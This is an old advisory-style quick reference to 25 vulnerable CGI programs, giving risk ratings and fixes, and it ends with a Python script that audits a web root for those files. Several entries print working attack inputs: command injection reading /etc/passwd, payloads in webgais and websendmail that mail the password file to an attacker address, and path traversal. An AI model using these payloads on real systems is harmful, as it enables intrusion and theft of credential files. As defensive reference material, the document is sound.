CGI Security Vulnerability Data Quick Reference v1.0 (Repost, Part 1)

Source: Internet
Author: User

Date: 2000-8-15

#############################################################################
# This article came from a friend. It is nothing precious; if you usually pay attention to collecting this kind of material, I believe many people have more comprehensive and better information than this. But for some reason, this information has been kept from the public. I am a little guy who believes in fully free, fully open, fully shared information, so I made it public. I hope that friend doesn't blame me :)
# If any security organization or individual is willing to maintain, update or change this article long-term and without interruption, for no reward, please go ahead on your own; there is no need to discuss it with me. The only requirement is that the results must be made completely public on the Internet. Any attempt to keep them for oneself is not welcome.
# Reposting of this article is welcome, but please keep these statements.
# If you have any questions or suggestions, please mailto:iwillsurewin@163.net
# Iwillsurewin 2000.7.28
############################################################################

         
1
Type: Attack type
Name: PHF
Risk Rating: Medium
Description: In the non-commercial NCSA or Apache (version 1.1.1) web servers, the code in util.c allows attackers to execute any command as root:
Http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
Suggestions:
Workaround: Upgrade the Apache Web server to 1.1.1 or upgrade the NCSA Web server to the latest version

_________________________________________________________________

2
Type: Attack type
Name: Wguest.exe
Risk Rating: Medium
Description: If you use NT as your web server operating system and Wguest.exe exists in your web executable directory, intruders will be able to use it to read files that all usr_
Recommendation: Remove Wguest.exe from your web directory
Workaround: Remove Wguest.exe from your web directory

___________________________________________________________________


3
Type: Attack type
Name: Rguest.exe
Risk Rating: Medium
Description: If you use NT as your web server operating system and Rguest.exe exists in your web executable directory, intruders will be able to use it to read files that all usr_
Recommendation: Remove Rguest.exe from your web directory
Workaround: Remove Rguest.exe from your web directory


_______________________________________________________________________

4
Type: Attack type
Name: Perl.exe
Risk Rating: Low
Description: Having perl.exe in the cgi-bin executable directory is a serious configuration error. Attackers can append a series of instructions after perl.exe and use a browser to execute any script on the server
Recommendation: perl.exe is not safe in any web directory with execute permissions
Workaround: Remove perl.exe from the web directory.


____________________________________________________________________


5
Type: Attack type
Name: Shtml.exe
Risk Rating: Low
Description: If you use FrontPage as your web server, intruders can use the IUSR_<hostname> user and shtml.exe to break into your machine and do things you don't want
Recommendation: Remove shtml.exe from your web directory
Workaround: Remove shtml.exe from your web directory


___________________________________________________________________


6
Type: Attack type
Name: wwwboard.pl
Risk Rating: Low
Description: The wwwboard.pl program makes it easy for an attacker to mount a DoS attack on the server
Recommendation: You can delete the file if it is not necessary
Workaround: In the get_variables subroutine, replace the following paragraph:

    if ($FORM{'followup'}) {
        $followup = "1";
        @followup_num = split(/,/, $FORM{'followup'});
        $num_followups = @followups = @followup_num;
        $last_message = pop(@followups);
        $origdate = "$FORM{'origdate'}";
        $origname = "$FORM{'origname'}";
        $origsubject = "$FORM{'origsubject'}";
    }

with:

    if ($FORM{'followup'}) {
        $followup = "1";
        @followup_num = split(/,/, $FORM{'followup'});
        $num_followups = @followups = @followup_num;
        $last_message = pop(@followups);
        $origdate = "$FORM{'origdate'}";
        $origname = "$FORM{'origname'}";
        $origsubject = "$FORM{'origsubject'}";
        # WWWBoard Bomb Patch
        # Written by: Samuel Sparling (sparling@slip.net)
        # Reject the post if any follow-up number appears more than once.
        $fn = 0;
        while ($fn < $num_followups)
        {
            $cur_fup = $followups[$fn];
            $dfn = 0;
            foreach $fm (@followups)
            {
                # Same message number at two different positions: duplicate.
                if ($followups[$dfn] == $followups[$fn] && $dfn != $fn)
                {
                    &error(board_bomb);
                }
                $dfn++;
            }
            $fn++;
        }
        # End WWWBoard Bomb Patch
    }

Related connection: HTTP://HGFR

_________________________________________________________________________

7
Type: Attack type
Name: Uploader.exe
Risk Rating: Medium
Description: If you use NT as your web server operating system, intruders can upload any file using Uploader.exe
Recommendation: Remove Uploader.exe from your web directory
Workaround: Remove Uploader.exe from your web directory

________________________________________________________________

8
Type: Attack type
Name: BDIR.HTR
Risk Rating: High
Description: If you use NT as your web server operating system and BDIR.HTR exists in your web executable directory, intruders will be able to use it to create ODBC databases on your server without limit and to generate some executable files.
Recommendation: Remove BDIR.HTR from your web directory
Workaround: Remove BDIR.HTR from your web directory

__________________________________________________________________

9
Type: Attack type
Name: count.cgi
Risk Rating: High
Description: The count.cgi program (wwwcount version 2.3) in the /cgi-bin directory has an overflow error that allows intruders to execute any instructions remotely without logging on.
Recommendation: You can delete the file if it is not necessary
Workaround: Upgrade wwwcount to 2.4 or later

_________________________________________________________________

10
Type: Attack type
Name: test-cgi
Risk Rating: High
Description: The test-cgi file can be used by intruders to browse important information on the server
Recommendation: Audit the programs in the cgi-bin directory and strictly control access rights
Workaround: Delete the test-cgi file

__________________________________________________________________

11
Type: Attack type
Name: nph-test-cgi
Risk Rating: High
Description: The nph-test-cgi file can be used by intruders to browse important information on the server
Recommendation: Audit the programs in the cgi-bin directory and strictly control access rights
Workaround: Delete the nph-test-cgi file

__________________________________________________________________

12
Type: Attack type
Name: php.cgi
Risk Rating: Low
Description: The php.cgi program has several vulnerabilities, including buffer overflow vulnerabilities and vulnerabilities that let intruders read any system file
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Removing the php.cgi program is the best way

_________________________________________________________________

13
Type: Attack type
Name: Handler
Risk Rating: Low
Description: On IRIX 5.3, 6.2, 6.3 and 6.4, the /cgi-bin/handler program has a buffer overflow error that allows an intruder to execute a program remotely on the server:
Telnet target.machine.com 80
Get/cgi-bin/handler/whatever;cat/etc/passwd|? data=download
http/1.0
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the handler file

________________________________________________________________


14
Type: Attack type
Name: Webgais
Risk Rating: High
Description: webgais in the /cgi-bin directory is an interface to the Gais search tool. It has a problem that allows intruders to bypass the program's security mechanism and execute system commands:
Post/cgi-bin/webgais http/1.0
CONTENT-LENGTH:85 (replace this and the actual length of the "Exploit" line)
Telnet target.machine.com 80

Query= '; mail+you\ @your. Host</etc/passwd;echo ' &output=subject&domain=paragraph
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the webgais file

________________________________________________________________

15
Type: Attack type
Name: Websendmail
Risk Rating: High
Description: The websendmail program in the /cgi-bin directory allows intruders to execute system commands:

Telnet target.machine.com 80
Post/cgi-bin/websendmail http/1.0
Content-length:xxx (should is replaced with the actual length of the string passed to the "server, in this case xxx=90)
Receiver=;mail+your_address\ @somewhere. Org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Advanced users: edit the websendmail script to filter special characters
General users: delete the websendmail file

____________________________________________________________________

16
Type: Attack type
Name: webdist.cgi
Risk Rating: High
Description: On IRIX 6.2 and 6.3 platforms, webdist.cgi in the /cgi-bin directory has a weakness that allows intruders to execute any instructions on the system without having to log on:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete /var/www/cgi-bin/webdist.cgi

__________________________________________________________________

17
Type: Attack type
Name: Faxsurvey
Risk Rating: High
Description: The faxsurvey program in the /cgi-bin directory on S.u.S.E. Linux allows intruders to execute instructions on the server without having to log on:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the /cgi-bin/faxsurvey file


_______________________________________________________________________


18
Type: Attack type
Name: Htmlscript
Risk Rating: Medium
Description: Servers with htmlscript 2.99x or earlier installed have a problem that allows intruders to view any file on the server:
Http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the /cgi-bin/htmlscript script file, or upgrade htmlscript to 3.0 or later


__________________________________________________________________________

19
Type: Attack type
Name: Pfdisplay
Risk Rating: Medium
Description: On web servers running IRIX 6.4 or earlier, the /cgi-bin/pfdisplay program allows intruders to view files on the server without authorization
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the /cgi-bin/pfdisplay file, or apply the patch
Patches can be downloaded from sgigate.sgi.com (204.94.209.1) or ftp.sgi.com.
Related link: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
Type: Attack type
Name: Www-sql
Risk Rating: Medium
Description: www-sql exists in the /cgi-bin/ directory, which allows intruders to gain unauthorized access to protected files
Recommendation: It is best to delete the www-sql file
Workaround:

    #if PHPFASTCGI
        while (FCGI_Accept() >= 0)
        {
    #endif
        /* Refuse to run unless the web server set REDIRECT_STATUS, i.e. the
           request arrived through a server redirect and not a direct URL. */
        s = getenv("REDIRECT_STATUS");
        if (!s) {
            puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
            exit(1);
        }
        s = getenv("PATH_TRANSLATED");

Related links:

_________________________________________________________________________________


21
Type: Attack type
Name: View-source
Risk Rating: High
Description: The view-source program in the cgi-bin directory performs no security checks on its input, allowing intruders to view any file on the server
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the view-source program in the /cgi-bin directory
Related link: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
Type: Attack type
Name: Campas
Risk Rating: High
Description: The campas program in the cgi-bin directory has a problem that allows intruders to arbitrarily view important files on the server:
Telnet Www.xxxx.net 80
Trying 200.xx.xx.xx ...
Connected to Venus.xxxx.net
Escape character is ' ^] '.
get/cgi-bin/campas?%0 acat%0a/etc/passwd%0a
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the campas program in the /cgi-bin directory
Related link: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
Type: Attack type
Name: Aglimpse
Risk Rating: High
Description: The aglimpse program in the cgi-bin directory has a problem that allows intruders to execute arbitrary instructions without having to log on
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the aglimpse program in the /cgi-bin directory
Related link: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
Type: Attack type
Name: at-admin.cgi
Risk Rating: Medium
Description: The /cgi-bin/at-admin.cgi program in Excite for Web Servers 1.1 allows ordinary users to take full control of the entire system
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the at-admin.cgi program in the /cgi-bin directory
Related link: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
Type: Attack type
Name: Finger
Risk Rating: Medium
Description: The finger program located under /cgi-bin can view information about other servers, but if the parameter is changed to the local machine, the account information on this machine is exposed:
/cgi-bin/finger? @localhost
Recommendation: Audit the cgi-bin directory and avoid leaving unnecessary programs in it
Workaround: Delete the finger program in the /cgi-bin directory
Related links:


________________________________________________________________________
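
The recommendation repeated throughout this list is to audit the cgi-bin directory for programs that should not be there. The following is an added example, not part of the original article: a Python script that walks a local web root and flags files whose names match entries 1 to 25, using the names and risk ratings listed above. The function names and the web root built in demo() are constructed for illustration.

```python
import os
import stat
import tempfile

# Entry number and risk rating as listed on this page, keyed by lowercase file name.
CATALOGUE = {
    "phf": (1, "Medium"), "wguest.exe": (2, "Medium"), "rguest.exe": (3, "Medium"),
    "perl.exe": (4, "Low"), "shtml.exe": (5, "Low"), "wwwboard.pl": (6, "Low"),
    "uploader.exe": (7, "Medium"), "bdir.htr": (8, "High"), "count.cgi": (9, "High"),
    "test-cgi": (10, "High"), "nph-test-cgi": (11, "High"), "php.cgi": (12, "Low"),
    "handler": (13, "Low"), "webgais": (14, "High"), "websendmail": (15, "High"),
    "webdist.cgi": (16, "High"), "faxsurvey": (17, "High"), "htmlscript": (18, "Medium"),
    "pfdisplay": (19, "Medium"), "www-sql": (20, "Medium"), "view-source": (21, "High"),
    "campas": (22, "High"), "aglimpse": (23, "High"), "at-admin.cgi": (24, "Medium"),
    "finger": (25, "Medium"),
}
RANK = {"High": 0, "Medium": 1, "Low": 2}

def audit_web_root(root):
    """Return catalogued files under root, highest risk first.

    'executable' reports whether any Unix execute bit is still set on the file.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            hit = CATALOGUE.get(name.lower())  # match regardless of case, as on NT
            if hit is None:
                continue
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            findings.append({
                "entry": hit[0], "risk": hit[1],
                "path": os.path.relpath(path, root),
                "executable": bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
            })
    return sorted(findings, key=lambda f: (RANK[f["risk"]], f["entry"]))

def demo():
    """Audit a constructed web root holding two catalogued files and one unrelated script."""
    with tempfile.TemporaryDirectory() as root:
        cgi = os.path.join(root, "cgi-bin")
        os.makedirs(cgi)
        for name, mode in (("PHF", 0o755), ("test-cgi", 0o644), ("guestbook.pl", 0o755)):
            path = os.path.join(cgi, name)
            open(path, "w").close()
            os.chmod(path, mode)
        return audit_web_root(root)

if __name__ == "__main__":
    for f in demo():
        print(f"[{f['risk']:6}] entry {f['entry']:2} {f['path']} executable={f['executable']}")
```

A match on name alone does not prove the file is the vulnerable version; treat each finding as a prompt to check the entry's workaround.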

